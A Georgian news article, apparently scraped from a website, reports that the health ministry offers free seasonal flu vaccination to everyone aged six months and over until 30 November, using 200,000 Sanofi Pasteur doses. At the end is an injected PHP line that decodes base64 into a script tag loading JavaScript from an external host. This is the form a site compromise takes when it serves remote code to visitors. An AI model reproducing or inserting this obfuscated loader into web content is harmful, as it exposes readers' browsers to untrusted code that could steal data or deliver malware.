celsiusi
ავერსი საქკაბელი
სეზონური გრიპის საწინააღმდეგო ვაქცინაცია, ყველა მსურველისთვის 30 ნოემბრის ჩათვლით იქნება უფასო, - ამის შესახებ ინფორმაციას ჯანდაცვის სამინისტრო ავრცელებს.
 
მათივე ცნობით, ქვეყნის მასშტაბით სეზონური საწინააღმდეგო აცრა, 6 თვის ასაკიდან უფასოა. ვაქცინის მიღება ნებისმიერ მსურველს ვაქცინაციის პროცესში ჩართულ 400-მდე სამედიცინო დაწესებულებაში შეეძლება.
 
"იმუნიზაციის სახელმწიფო პროგრამის ფარგლებში, საქართველომ, 200 000 დოზა, სანოფი პასტერის წარმოების, ოთხ-კომპონენტიანი ვაქცინა შეიძინა, რომელიც ერთ-ერთია ჯანმოს მიერ რეკომენდებულ ვაქცინებს შორის. დაავადებათა კონტროლისა და საზოგადოებრივი ჯანმრთელობის ცენტრმა, ვაქცინაცია სექტემბრის ბოლოს დაიწყო. პირველ ეტაპზე, მომსახურება, დაავადების გართულების მომატებული რისკის მქონე პირებმა მიიღეს. 30 ნოემბრის ჩათვლით კი ვაქცინაცია ნებისმიერი მსურველისთვის უფასო იქნება", - ვკითხულობთ ჯანდაცვის სამინისტროს განცხადებაში.
281
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");